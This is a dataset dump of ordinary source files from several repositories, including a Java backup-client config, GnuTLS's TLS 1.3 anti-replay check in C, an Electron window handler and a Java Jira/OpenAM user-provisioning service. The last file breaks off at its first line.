repo_name
stringlengths 6
101
| path
stringlengths 4
300
| text
stringlengths 7
1.31M
|
|---|---|---|
meks77/ClientServerBackup
|
client/src/main/java/at/meks/backupclientserver/client/ApplicationConfig.java
|
package at.meks.backupclientserver.client;
import at.meks.validation.result.ValidationException;
import com.google.inject.Inject;
import com.google.inject.Singleton;
import java.io.FileInputStream;
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.Optional;
import java.util.Properties;
import java.util.Set;
import java.util.stream.Collectors;
import static at.meks.validation.validations.common.CommonValidations.isTrue;
import static at.meks.validation.validations.list.ListValidations.hasMinSize;
import static at.meks.validation.validations.string.StringValidations.isNotBlank;
import static java.lang.String.format;
import static java.util.Arrays.asList;
import static java.util.Optional.ofNullable;
/**
 * Provides typed access to the backup client configuration. Properties are
 * lazily loaded from the config file resolved by {@link FileService} on the
 * first accessor call.
 */
@Singleton
public class ApplicationConfig {

    private Properties properties;

    @Inject
    private FileService fileService;

    /**
     * Returns the directories configured for backup: the values of all
     * properties whose key starts with "backupset.dir".
     */
    Path[] getBackupedDirs() {
        return getProperties().stringPropertyNames().stream()
                .filter(s -> s.startsWith("backupset.dir"))
                .map(properties::get)
                .map(o -> (String) o)
                .map(Paths::get)
                .toArray(Path[]::new);
    }

    /** Returns the backup server host ("server.host"), or null if not configured. */
    public String getServerHost() {
        return getProperties().getProperty("server.host");
    }

    /** Returns the backup server port ("server.port"), defaulting to 8080 when unset. */
    public int getServerPort() {
        return ofNullable(getProperties().getProperty("server.port"))
                .map(Integer::parseInt)
                .orElse(8080);
    }

    /** Lazily loads the properties on first access. */
    private Properties getProperties() {
        if (properties == null) {
            initializeProperties();
        }
        return properties;
    }

    /**
     * Reads the configuration file into {@link #properties}.
     *
     * @throws ClientBackupException if the config file cannot be read
     */
    private void initializeProperties() {
        // Bug fix: the FileInputStream was previously never closed, leaking a
        // file handle on every initialization; use try-with-resources.
        try (FileInputStream inputStream = new FileInputStream(fileService.getConfigFile().toFile())) {
            Properties configProps = new Properties();
            configProps.load(inputStream);
            properties = configProps;
        } catch (IOException e) {
            throw new ClientBackupException("couldn't read config file", e);
        }
    }

    /**
     * Validates the mandatory configuration: a non-blank server host and at
     * least one backup directory that exists and is a directory.
     *
     * @throws ValidationException if any of the checks fail
     */
    void validate() throws ValidationException {
        isNotBlank().test(getServerHost()).throwIfInvalid("Config property server.host");
        Path[] backupedDirs = getBackupedDirs();
        hasMinSize(1).test(asList(backupedDirs)).throwIfInvalid("Configured directories for backup");
        for (Path backupedDir : backupedDirs) {
            isTrue().test(backupedDir.toFile().exists())
                    .throwIfInvalid(format("Configured directory %s must exist", backupedDir));
            isTrue().test(backupedDir.toFile().isDirectory())
                    .throwIfInvalid(format("Path %s must be a directory", backupedDir));
        }
    }

    /** Returns the values of all "excludes.exclude*" properties as a list. */
    List<String> getPathExcludesForBackup() {
        return getProperties().keySet().stream()
                .map(o -> (String) o)
                .filter(s -> s.startsWith("excludes.exclude"))
                .map(key -> (String) getProperties().get(key))
                .collect(Collectors.toList());
    }

    /**
     * Returns the file extensions excluded from backup, parsed from the
     * comma-separated "excludes.fileextensions" property; empty entries are
     * dropped and whitespace is trimmed.
     */
    public Set<String> getExcludedFileExtensions() {
        Optional<String> extensions = ofNullable(getProperties().get("excludes.fileextensions"))
                .map(o -> (String) o);
        return extensions
                .map(s -> Arrays.stream(s.split(","))
                        .map(String::trim)
                        .filter(extension -> extension.length() > 0)
                        .collect(Collectors.toSet()))
                .orElse(Collections.emptySet());
    }

    /** Returns the values of all "excludes.exclude*" properties as a set. */
    public Set<String> getExcludes() {
        return getProperties().stringPropertyNames().stream()
                .filter(s -> s.startsWith("excludes.exclude"))
                .map(properties::get)
                .map(o -> (String) o)
                .collect(Collectors.toSet());
    }
}
|
shuaih7/FabricUI
|
FabricUI/pattern/pattern_utils.py
|
<filename>FabricUI/pattern/pattern_utils.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Created on 03.02.2021
Updated on 03.18.2021
Author: <EMAIL>
'''
import os
def preprocessResults(results):
    """Derive pattern statistics from detection results, in place.

    Boxes labeled 0 ("long" defects) contribute their horizontal center,
    width, and index; boxes labeled 1 are collected verbatim. The computed
    ``pattern`` dict is attached to ``results`` and the dict is returned.
    """
    boxes = results['boxes']
    labels = results['labels']

    centers = []
    widths = []
    indices = []
    short_boxes = []

    for idx, box in enumerate(boxes):
        if labels[idx] == 0:  # long defects
            centers.append((box[0] + box[2]) / 2)
            indices.append(idx)
            widths.append(box[2] - box[0])
        elif labels[idx] == 1:
            short_boxes.append(box)

    results['pattern'] = {
        'x': centers,
        'width': widths,
        'indices': indices,
        's_boxes': short_boxes,
    }
    return results
|
consulo/consulo-sql
|
src/com/dci/intellij/dbn/data/sorting/MultiColumnSortingState.java
|
<filename>src/com/dci/intellij/dbn/data/sorting/MultiColumnSortingState.java
/*
* Copyright 2012-2014 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.dci.intellij.dbn.data.sorting;
import java.util.ArrayList;
import java.util.List;
/**
 * Holds the sorting state for up to {@link #maxColumns} columns, in priority
 * order (index 0 is the primary sort column).
 */
public class MultiColumnSortingState<T> {

    /** Maximum number of simultaneously active sorting columns. */
    private int maxColumns = 3;
    private List<SortingInstruction<T>> sortingInstructions = new ArrayList<SortingInstruction<T>>();

    /**
     * Applies sorting for the given column. An indefinite direction means
     * "toggle" for a known column and defaults to ascending for a new one.
     *
     * @param column     the column to sort by
     * @param direction  the requested direction; may be indefinite
     * @param isAddition true to add to the existing multi-column sort,
     *                   false to replace it with a single-column sort
     */
    public void applySorting(T column, SortDirection direction, boolean isAddition) {
        SortingInstruction<T> instruction = getInstruction(column);
        boolean isNewColumn = instruction == null;
        if (isNewColumn) {
            if (direction.isIndefinite()) {
                direction = SortDirection.ASCENDING;
            }
            instruction = new SortingInstruction<T>(column, direction);
        } else {
            if (direction.isIndefinite()) {
                instruction.switchDirection();
            } else {
                instruction.setDirection(direction);
            }
        }
        if (isAddition) {
            if (isNewColumn) {
                // Drop the lowest-priority instruction(s) to stay within the
                // limit. Bug fix: was "== maxColumns", which never shrinks the
                // list if it ever exceeds the limit; use ">=" to enforce the
                // invariant unconditionally.
                while (sortingInstructions.size() >= maxColumns) {
                    sortingInstructions.remove(sortingInstructions.size() - 1);
                }
                sortingInstructions.add(instruction);
            }
        } else {
            sortingInstructions.clear();
            sortingInstructions.add(instruction);
        }
    }

    /** Returns the instruction for the given column, or null if not sorted by it. */
    private SortingInstruction<T> getInstruction(T column) {
        for (SortingInstruction<T> instruction : sortingInstructions) {
            if (instruction.getColumn().equals(column)) {
                return instruction;
            }
        }
        return null;
    }

    public List<SortingInstruction<T>> getSortingInstructions() {
        return sortingInstructions;
    }

    public int getMaxColumns() {
        return maxColumns;
    }

    /** Sets the column limit and trims the current state to fit it. */
    public void setMaxColumns(int maxColumns) {
        this.maxColumns = maxColumns;
        if (sortingInstructions.size() > maxColumns) {
            sortingInstructions = new ArrayList<SortingInstruction<T>>(sortingInstructions.subList(0, maxColumns));
        }
    }

    /** Returns a deep copy of this sorting state. */
    public MultiColumnSortingState<T> clone() {
        MultiColumnSortingState<T> clone = new MultiColumnSortingState<T>();
        // Bug fix: maxColumns was previously not copied, so a clone silently
        // reverted to the default limit of 3.
        clone.maxColumns = maxColumns;
        for (SortingInstruction<T> criterion : sortingInstructions) {
            clone.sortingInstructions.add(criterion.clone());
        }
        return clone;
    }
}
|
TheShellLand/crossover-source
|
gnutls/gnutls/lib/tls13/anti_replay.c
|
/*
* Copyright (C) 2018 Red Hat, Inc.
*
* Author: <NAME>
*
* This file is part of GnuTLS.
*
* The GnuTLS is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public License
* as published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>
*
*/
#include "gnutls_int.h"
#include "db.h"
#include "system.h"
#include "tls13/anti_replay.h"
/* The default time window in milliseconds; RFC8446 suggests the order
* of ten seconds is sufficient for the clients on the Internet. */
#define DEFAULT_WINDOW_MS 10000
/* Anti-replay context attached to a server session (RFC 8446, 8.2). */
struct gnutls_anti_replay_st {
	uint32_t window;                /* ClientHello recording window, in milliseconds */
	struct timespec start_time;     /* start of the current recording window */
	gnutls_db_add_func db_add_func; /* stores ClientHello entries; NULL disables early data */
	void *db_ptr;                   /* opaque pointer handed to db_add_func */
};
/**
* gnutls_anti_replay_init:
* @anti_replay: is a pointer to #gnutls_anti_replay_t type
*
* This function will allocate and initialize the @anti_replay context
* to be usable for detect replay attacks. The context can then be
* attached to a @gnutls_session_t with
* gnutls_anti_replay_enable().
*
* Returns: Zero or a negative error code on error.
*
* Since: 3.6.5
**/
int
gnutls_anti_replay_init(gnutls_anti_replay_t *anti_replay)
{
	/* Zero-initialize so db_add_func and db_ptr start unset. */
	*anti_replay = gnutls_calloc(1, sizeof(struct gnutls_anti_replay_st));
	if (!*anti_replay)
		return gnutls_assert_val(GNUTLS_E_MEMORY_ERROR);
	(*anti_replay)->window = DEFAULT_WINDOW_MS;
	/* Recording windows are measured from this timestamp; tickets created
	 * before it are rejected in _gnutls_anti_replay_check(). */
	gnutls_gettime(&(*anti_replay)->start_time);
	return 0;
}
/**
* gnutls_anti_replay_set_window:
* @anti_replay: is a #gnutls_anti_replay_t type.
* @window: is the time window recording ClientHello, in milliseconds
*
* Sets the time window used for ClientHello recording. In order to
* protect against replay attacks, the server records ClientHello
* messages within this time period from the last update, and
* considers it a replay when a ClientHello outside of the period; if
* a ClientHello arrives within this period, the server checks the
* database and detects duplicates.
*
* For the details of the algorithm, see RFC 8446, section 8.2.
*
* Since: 3.6.5
*/
void
gnutls_anti_replay_set_window(gnutls_anti_replay_t anti_replay,
			      unsigned int window)
{
	/* Value is taken as-is, in milliseconds; no range validation here. */
	anti_replay->window = window;
}
/**
* gnutls_anti_replay_deinit:
* @anti_replay: is a #gnutls_anti_replay type
*
* This function will deinitialize all resources occupied by the given
* anti-replay context.
*
* Since: 3.6.5
**/
void
gnutls_anti_replay_deinit(gnutls_anti_replay_t anti_replay)
{
	/* The context owns no other allocations; freeing the struct suffices.
	 * db_ptr is owned by the caller. */
	gnutls_free(anti_replay);
}
/**
* gnutls_anti_replay_enable:
* @session: is a #gnutls_session_t type.
* @anti_replay: is a #gnutls_anti_replay_t type.
*
* Request that the server should use anti-replay mechanism.
*
* Since: 3.6.5
**/
void
gnutls_anti_replay_enable(gnutls_session_t session,
			  gnutls_anti_replay_t anti_replay)
{
	/* Anti-replay only makes sense on the server side; on a client
	 * session this is a no-op (gnutls_assert only logs). */
	if (unlikely(session->security_parameters.entity != GNUTLS_SERVER)) {
		gnutls_assert();
		return;
	}
	session->internals.anti_replay = anti_replay;
}
/*
 * Decides whether early data offered with a resumed session must be
 * treated as a possible replay, per RFC 8446 section 8.2 (ClientHello
 * recording).
 *
 * Returns 0 when the ClientHello is accepted, or a negative error code
 * (typically GNUTLS_E_EARLY_DATA_REJECTED) when early data must be
 * rejected.
 */
int
_gnutls_anti_replay_check(gnutls_anti_replay_t anti_replay,
			  uint32_t client_ticket_age,
			  struct timespec *ticket_creation_time,
			  gnutls_datum_t *id)
{
	struct timespec now;
	time_t window;
	uint32_t server_ticket_age, diff;
	gnutls_datum_t key = { NULL, 0 };
	gnutls_datum_t entry = { NULL, 0 };
	unsigned char key_buffer[MAX_HASH_SIZE + 12]; /* 12-byte time prefix + ticket id */
	unsigned char entry_buffer[12]; /* magic + timestamp + expire_time */
	unsigned char *p;
	int ret;
	if (unlikely(id->size > MAX_HASH_SIZE))
		return gnutls_assert_val(GNUTLS_E_INTERNAL_ERROR);
	gnutls_gettime(&now);
	server_ticket_age = timespec_sub_ms(&now, ticket_creation_time);
	/* It shouldn't be possible that the server's view of ticket
	 * age is smaller than the client's view.
	 */
	if (unlikely(server_ticket_age < client_ticket_age))
		return gnutls_assert_val(GNUTLS_E_ILLEGAL_PARAMETER);
	/* If the ticket was created before recording started, reject
	 * early data: we have no record covering that period.
	 */
	if (_gnutls_timespec_cmp(ticket_creation_time,
				 &anti_replay->start_time) < 0) {
		_gnutls_handshake_log("anti_replay: ticket is created before recording has started\n");
		return gnutls_assert_val(GNUTLS_E_EARLY_DATA_REJECTED);
	}
	/* If certain amount of time (window) has elapsed, rollover
	 * the recording.
	 */
	diff = timespec_sub_ms(&now, &anti_replay->start_time);
	if (diff > anti_replay->window)
		gnutls_gettime(&anti_replay->start_time);
	/* If expected_arrival_time is out of window, reject early
	 * data.
	 */
	if (server_ticket_age - client_ticket_age > anti_replay->window) {
		_gnutls_handshake_log("anti_replay: server ticket age: %u, client ticket age: %u\n",
				      server_ticket_age,
				      client_ticket_age);
		return gnutls_assert_val(GNUTLS_E_EARLY_DATA_REJECTED);
	}
	/* Check if the ClientHello is stored in the database.
	 * No storage callback configured means replay cannot be ruled out,
	 * so early data is rejected outright.
	 */
	if (!anti_replay->db_add_func)
		return gnutls_assert_val(GNUTLS_E_EARLY_DATA_REJECTED);
	/* Create a key for database lookup, prefixing window start
	 * time to ID. Note that this shouldn't clash with session ID
	 * used in TLS 1.2, because such IDs are 32 octets, while here
	 * the key becomes 44+ octets.
	 */
	p = key_buffer;
	/* tv_sec is split into two 32-bit writes to be safe on 64-bit time_t. */
	_gnutls_write_uint32((uint64_t) anti_replay->start_time.tv_sec >> 32, p);
	p += 4;
	_gnutls_write_uint32(anti_replay->start_time.tv_sec & 0xFFFFFFFF, p);
	p += 4;
	_gnutls_write_uint32(anti_replay->start_time.tv_nsec, p);
	p += 4;
	memcpy(p, id->data, id->size);
	p += id->size;
	key.data = key_buffer;
	key.size = p - key_buffer;
	/* Create an entry to be stored on database if the lookup
	 * failed. This is formatted so that
	 * gnutls_db_check_entry_expire_time() work.
	 */
	p = entry_buffer;
	_gnutls_write_uint32(PACKED_SESSION_MAGIC, p);
	p += 4;
	_gnutls_write_uint32(now.tv_sec, p);
	p += 4;
	window = anti_replay->window / 1000; /* expire time is stored in seconds */
	_gnutls_write_uint32(window, p);
	p += 4;
	entry.data = entry_buffer;
	entry.size = p - entry_buffer;
	/* db_add_func is expected to fail (e.g. GNUTLS_E_DB_ENTRY_EXISTS)
	 * when the key is already present, which signals a replay. */
	ret = anti_replay->db_add_func(anti_replay->db_ptr,
				       (uint64_t)now.tv_sec+(uint64_t)window, &key, &entry);
	if (ret < 0) {
		_gnutls_handshake_log("anti_replay: duplicate ClientHello found\n");
		return gnutls_assert_val(GNUTLS_E_EARLY_DATA_REJECTED);
	}
	return 0;
}
/**
* gnutls_anti_replay_set_ptr:
* @anti_replay: is a #gnutls_anti_replay_t type.
* @ptr: is the pointer
*
* Sets the pointer that will be provided to db add function
* as the first argument.
**/
void gnutls_anti_replay_set_ptr(gnutls_anti_replay_t anti_replay, void *ptr)
{
	/* Stored verbatim; ownership stays with the caller. */
	anti_replay->db_ptr = ptr;
}
/**
* gnutls_anti_replay_set_add_function:
* @anti_replay: is a #gnutls_anti_replay_t type.
* @add_func: is the function.
*
* Sets the function that will be used to store an entry if it is not
* already present in the resumed sessions database. This function returns 0
* if the entry is successfully stored, and a negative error code
* otherwise. In particular, if the entry is found in the database,
* it returns %GNUTLS_E_DB_ENTRY_EXISTS.
*
* The arguments to the @add_func are:
* - %ptr: the pointer set with gnutls_anti_replay_set_ptr()
* - %exp_time: the expiration time of the entry
* - %key: a pointer to the key
* - %data: a pointer to data to store
*
* The data set by this function can be examined using
* gnutls_db_check_entry_expire_time() and gnutls_db_check_entry_time().
*
* Since: 3.6.5
**/
void
gnutls_anti_replay_set_add_function(gnutls_anti_replay_t anti_replay,
				    gnutls_db_add_func add_func)
{
	/* If left unset, _gnutls_anti_replay_check() rejects all early data. */
	anti_replay->db_add_func = add_func;
}
|
dotnetweekly/dnw-api
|
endpoint-public/handlers/user/unsubscribe.js
|
<filename>endpoint-public/handlers/user/unsubscribe.js<gh_stars>0
const sanitize = require('mongo-sanitize');
const Guid = require("guid");
const UserModel = require("../../../db/models/user.model");
const NotFoundError = require("../../../error/not-found");
const UnauthorizedError = require("../../../error/unauthorized");
/**
 * Unsubscribes the user identified by the unsubscribe key in the request
 * body, then rotates the key so the same link cannot be reused.
 * Responds via callback.onSuccess; failures are reported through the
 * `error` field of the payload (no onError channel is used here).
 */
const unsubscribe = function(req, callback) {
  // Sanitize to prevent MongoDB operator injection via the request body.
  const key = sanitize(req.body.key);
  UserModel.findOne({ keyUnsubscribe: key, isActive: true }, function(error, user) {
    if (error || !user) {
      callback.onSuccess({ error: "User not found or not activated yet." });
      return;
    }
    user.subscribed = false;
    // Rotate the key so the unsubscribe link is single-use.
    user.keyUnsubscribe = Guid.raw();
    user.save(function(err) {
      if (err) {
        // Bug fix: the save error was previously swallowed and success was
        // reported even when nothing was persisted.
        callback.onSuccess({ error: "Could not update subscription settings." });
        return;
      }
      callback.onSuccess({});
    });
  });
};
module.exports = unsubscribe;
|
zurawiki/netlify-cms
|
src/components/EditorWidgets/DateTime/DateTimeControl.js
|
<filename>src/components/EditorWidgets/DateTime/DateTimeControl.js
import React from 'react';
import PropTypes from 'prop-types';
import DateControl from 'EditorWidgets/Date/DateControl';
export default class DateTimeControl extends React.Component {
static propTypes = {
field: PropTypes.object.isRequired,
onChange: PropTypes.func.isRequired,
classNameWrapper: PropTypes.string.isRequired,
setActiveStyle: PropTypes.func.isRequired,
setInactiveStyle: PropTypes.func.isRequired,
value: PropTypes.oneOfType([
PropTypes.object,
PropTypes.string,
]),
format: PropTypes.string,
};
render() {
const {
field,
format,
onChange,
value,
classNameWrapper,
setActiveStyle,
setInactiveStyle
} = this.props;
return (
<DateControl
onChange={onChange}
format={format}
value={value}
field={field}
classNameWrapper={classNameWrapper}
setActiveStyle={setActiveStyle}
setInactiveStyle={setInactiveStyle}
includeTime
/>
);
}
}
|
seniortesting/cheatsheet-startup-parent
|
cheatsheet-startup-js/nuxt-desktop/src/main/BrowserWinHandler.js
|
<filename>cheatsheet-startup-js/nuxt-desktop/src/main/BrowserWinHandler.js
import { EventEmitter } from 'events'
import { BrowserWindow, app } from 'electron'
import customUI from './customUI'
import i18n from './i18n'
const isProduction = process.env.NODE_ENV === 'production'
/**
 * Manages the lifecycle of the application's BrowserWindow: creation on app
 * ready, recreation on macOS dock activation, system tray integration, and
 * hide-instead-of-close behavior.
 */
export default class BrowserWinHandler {
  /**
   * @param [options] {object} - browser window options
   * @param [allowRecreate] {boolean} - recreate the window on macOS 'activate'
   */
  constructor (options, allowRecreate = true) {
    this._eventEmitter = new EventEmitter()
    this.allowRecreate = allowRecreate
    this.options = options
    this.browserWindow = null
    this.appTray = null
    this._createInstance()
  }

  _createInstance () {
    // This method will be called when Electron has finished
    // initialization and is ready to create browser windows.
    // Some APIs can only be used after this event occurs.
    app.on('ready', () => {
      this._create()
    })
    // On macOS it's common to re-create a window in the app when the
    // dock icon is clicked and there are no other windows open.
    if (!this.allowRecreate) { return }
    app.on('activate', () => this._recreate())
    // Add support for system tray.
    // NOTE(review): when allowRecreate is false the early return above also
    // skips registering this handler — confirm that is intended.
    app.on('window-all-closed', () => {
      // Bug fix: this callback was a plain `function`, so `this` was not the
      // handler instance and `this.appTray` was always undefined, leaving the
      // tray icon alive. An arrow function captures the correct `this`.
      // Destroy the tray icon.
      if (this.appTray) { this.appTray.destroy() }
      // On macOS users often close the main window but keep using the menu
      // bar, so do not force-quit there.
      if (process.platform !== 'darwin') {
        app.quit()
      }
    })
  }

  _create () {
    this.browserWindow = new BrowserWindow(
      {
        ...this.options,
        webPreferences: {
          ...this.options.webPreferences,
          webSecurity: isProduction, // disable on dev to allow loading local resources
          allowRunningInsecureContent: true,
          allowDisplayingInsecureContent: true,
          plugins: true, // BrowserWindow.addExtension
          defaultFontSize: 18, // default is 16
          defaultEncoding: 'UTF-8',
          nodeIntegration: true, // allow loading modules via the require () function
          devTools: !process.env.SPECTRON // disable on e2e test environment
        }
      }
    )
    // Set up application menu, auto-update checks and the system tray.
    customUI.setApplicationMenu()
    this.appTray = customUI.createTray()
    customUI.createUpdates()
    this.browserWindow.on('close', (event) => {
      // Dereference the window object
      // this.browserWindow = null
      // NOTE(review): isQuitting is set to true right before it is tested,
      // so the hide-to-tray branch below is unreachable and the app always
      // quits on close — confirm whether hiding was meant to stay enabled.
      app.isQuitting = true
      if (!app.isQuitting) {
        event.preventDefault()
        process.platform === 'darwin' ? app.hide() : this.browserWindow.hide()
        customUI.displayTrayBalloon('', i18n.t('tray-hide-message'))
      } else {
        app.quit()
      }
    })
    this.browserWindow.on('minimize', (event) => {
      // Minimizing hides the window to the tray instead of the taskbar/dock.
      event.preventDefault()
      process.platform === 'darwin' ? app.hide() : this.browserWindow.hide()
      customUI.displayTrayBalloon('', i18n.t('tray-hide-message'))
    })
    this.browserWindow.on('show', function () {
      // this.appTray.setHighlightMode('selection')
    })
    this.browserWindow.webContents.once('did-frame-finish-load', () => {
      // Initiate auto-updates on MacOS and Windows
      // log.info('check updating when start the page...')
      customUI.checkUpdates()
    })
    this.browserWindow.webContents.on('crashed', function () {
      // crash report
    })
    // Notify onCreated()/created() subscribers.
    this._eventEmitter.emit('created')
  }

  _recreate () {
    if (this.browserWindow === null) { this._create() }
  }

  /**
   * @callback onReadyCallback
   * @param {BrowserWindow}
   */
  /**
   * Invokes the callback once, as soon as the window has been created.
   * @param callback {onReadyCallback}
   */
  onCreated (callback) {
    this._eventEmitter.once('created', () => {
      callback(this.browserWindow)
    })
  }

  /**
   * Resolves once the window has been created.
   * @returns {Promise<BrowserWindow>}
   */
  created () {
    return new Promise((resolve) => {
      this._eventEmitter.once('created', () => {
        resolve(this.browserWindow)
      })
    })
  }
}
|
navikt/dolly-backend
|
dolly-backend-app/src/main/java/no/nav/dolly/service/OpenAmService.java
|
package no.nav.dolly.service;
import static java.lang.String.format;
import static java.nio.charset.StandardCharsets.UTF_8;
import lombok.RequiredArgsConstructor;
import lombok.extern.slf4j.Slf4j;
import no.nav.dolly.domain.jira.AllowedValue;
import no.nav.dolly.domain.jira.Field;
import no.nav.dolly.domain.jira.Fields;
import no.nav.dolly.domain.jira.JiraResponse;
import no.nav.dolly.domain.jira.Project;
import no.nav.dolly.domain.resultset.RsOpenAmResponse;
import no.nav.dolly.exceptions.JiraException;
import no.nav.dolly.consumer.jira.JiraConsumer;
import org.codehaus.jettison.json.JSONException;
import org.codehaus.jettison.json.JSONObject;
import org.springframework.core.io.FileSystemResource;
import org.springframework.http.HttpEntity;
import org.springframework.http.HttpMethod;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.stereotype.Service;
import org.springframework.util.LinkedMultiValueMap;
import org.springframework.web.client.HttpStatusCodeException;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.Writer;
import java.util.List;
/**
 * Creates OpenAM test identities by filing a Jira DEPLOY issue and attaching
 * the list of identities as a text file.
 */
@Slf4j
@Service
@RequiredArgsConstructor
public class OpenAmService {

    private static final String ISSUE_CREATE = "/rest/api/2/issue";
    private static final String METADATA = "/createmeta?projectKeys=DEPLOY&issuetypeIds=16001&expand=projects.issuetypes.fields";
    private static final String ATTACHMENTS = "/attachments";
    private static final String BROWSE = "/browse";
    private static final String FEILMELDING = "En feil oppsto. Bestilling kan ikke utføres.";
    private static final String FEILMELDING_UKJENT_MILJOE = "Angitt miljø eksisterer ikke.";

    private final JiraConsumer jiraConsumer;

    /**
     * Creates the given identities in the given environment by filing a Jira
     * issue and attaching the identity list.
     *
     * @param identliste identities to create
     * @param miljoe     target environment name
     * @return a response describing success (with a browse link) or failure
     */
    public RsOpenAmResponse opprettIdenter(List<String> identliste, String miljoe) {
        try {
            Fields fields = readOpenAmMetadata();
            ResponseEntity<JiraResponse> createResponse = createIssue(miljoe, fields);
            ResponseEntity<String> attachmentResponse = createAttachment(identliste, createResponse);
            return RsOpenAmResponse.builder()
                    .miljoe(miljoe)
                    .status(attachmentResponse.getStatusCode())
                    .httpCode(attachmentResponse.getStatusCode().value())
                    // Only include the browse link when the attachment upload
                    // succeeded and the issue key is available.
                    .message(HttpStatus.OK.value() == attachmentResponse.getStatusCodeValue() &&
                            createResponse.getBody() != null ?
                            format("%s%s/%s", jiraConsumer.getBaseUrl(), BROWSE, createResponse.getBody().getKey()) : null)
                    .build();
        } catch (JiraException e) {
            return RsOpenAmResponse.builder()
                    .miljoe(miljoe)
                    .status(e.getStatusCode())
                    .message(e.getStatusText())
                    .httpCode(e.getStatusCode().value())
                    .build();
        } catch (HttpStatusCodeException e) {
            log.error(e.getMessage(), e);
            return RsOpenAmResponse.builder()
                    .miljoe(miljoe)
                    .status(e.getStatusCode())
                    .message(FEILMELDING)
                    .httpCode(e.getStatusCode().value())
                    .build();
        }
    }

    /**
     * Uploads the identity list as a file attachment on the created issue.
     *
     * @throws JiraException if the create-issue response carried no body
     */
    private ResponseEntity<String> createAttachment(List<String> identliste, ResponseEntity<JiraResponse> createResponse) {
        LinkedMultiValueMap<String, Object> params = new LinkedMultiValueMap<>();
        params.add("file", new FileSystemResource(createIdentsFile(identliste)));
        if (createResponse != null && createResponse.getBody() != null) {
            return jiraConsumer.excuteRequest(
                    format("%s/%s%s", ISSUE_CREATE, createResponse.getBody().getKey(), ATTACHMENTS),
                    HttpMethod.POST, new HttpEntity<>(params, jiraConsumer.createHttpHeaders(MediaType.MULTIPART_FORM_DATA, createResponse.getHeaders())), String.class);
        } else {
            log.error("Mottatt tom response body paa createIssue.");
            throw new JiraException(HttpStatus.INTERNAL_SERVER_ERROR, FEILMELDING);
        }
    }

    /**
     * Creates the Jira issue for the requested environment.
     *
     * @throws JiraException if metadata is incomplete or the environment is unknown
     */
    private ResponseEntity<JiraResponse> createIssue(String miljoe, Fields fields) {
        String envId = null;
        if (fields == null || isInvalid(fields.getCustomfield_14811()) || isInvalid(fields.getProject()) || isInvalid(fields.getIssuetype())) {
            log.error("En eller flere nødvendige felter i metadata er null.");
            throw new JiraException(HttpStatus.INTERNAL_SERVER_ERROR, FEILMELDING);
        }
        // Resolve the environment name to its Jira custom-field value id.
        for (AllowedValue allowedValue : fields.getCustomfield_14811().getAllowedValues()) {
            if (miljoe.equals(allowedValue.getValue())) {
                envId = allowedValue.getId();
                break;
            }
        }
        if (envId == null) {
            throw new JiraException(HttpStatus.BAD_REQUEST, FEILMELDING_UKJENT_MILJOE);
        }
        String request = null;
        try {
            request = new JSONObject()
                    .put("fields", new JSONObject()
                            .put("summary", "Opprett testbrukere fra Dolly")
                            .put("project", new JSONObject()
                                    .put("id", fields.getProject().getAllowedValues().get(0).getId())
                                    .put("key", fields.getProject().getAllowedValues().get(0).getKey()))
                            .put("issuetype", new JSONObject()
                                    .put("id", fields.getIssuetype().getAllowedValues().get(0).getId()))
                            .put("customfield_14811", new JSONObject()
                                    .put("id", envId))
                    ).toString();
        } catch (JSONException e) {
            log.error(e.getMessage(), e);
        }
        return jiraConsumer.excuteRequest(ISSUE_CREATE, HttpMethod.POST,
                new HttpEntity<>(request, jiraConsumer.createHttpHeaders(MediaType.APPLICATION_JSON)), JiraResponse.class);
    }

    /** Returns true when the field is missing or has no allowed values. */
    private boolean isInvalid(Field field) {
        return field == null || field.getAllowedValues().isEmpty();
    }

    /**
     * Fetches the create-issue metadata used to resolve field ids.
     *
     * @throws JiraException if the metadata response is empty or incomplete
     */
    private Fields readOpenAmMetadata() {
        ResponseEntity<Project> metadata = jiraConsumer.excuteRequest(format("%s%s", ISSUE_CREATE, METADATA), HttpMethod.GET,
                new HttpEntity<>("", jiraConsumer.createHttpHeaders(MediaType.APPLICATION_JSON)), Project.class);
        if (metadata != null && metadata.getBody() != null && isMetadataNotEmpty(metadata)) {
            return metadata.getBody().getProjects().get(0).getIssuetypes().get(0).getFields();
        } else {
            log.error("En eller flere nødvendige felter i metadata er null.");
            throw new JiraException(HttpStatus.INTERNAL_SERVER_ERROR, FEILMELDING);
        }
    }

    private boolean isMetadataNotEmpty(ResponseEntity<Project> metadata) {
        return !metadata.getBody().getProjects().isEmpty() && !metadata.getBody().getProjects().get(0).getIssuetypes().isEmpty();
    }

    /**
     * Writes the identities to a temp file in the format expected by the
     * OpenAM import (one "ident;4;n;e;" line per identity).
     *
     * @throws JiraException if the file cannot be created or written
     */
    private File createIdentsFile(List<String> identliste) {
        try {
            File tempFile = File.createTempFile("OpenAM-", ".txt");
            try (Writer writer = new OutputStreamWriter(new FileOutputStream(tempFile), UTF_8)) {
                for (String ident : identliste) {
                    writer.write(format("%s;4;n;e;%n", ident));
                }
            }
            return tempFile;
        } catch (IOException e) {
            // Bug fix: previously the exception was logged and null returned,
            // causing a NullPointerException downstream in FileSystemResource.
            // Fail fast with the same error contract the callers already handle.
            log.error(e.getMessage(), e);
            throw new JiraException(HttpStatus.INTERNAL_SERVER_ERROR, FEILMELDING);
        }
    }
}
|
ryanmdoyle/class-karma
|
web/src/components/svg/Manage/Manage.js
|
<reponame>ryanmdoyle/class-karma
/**
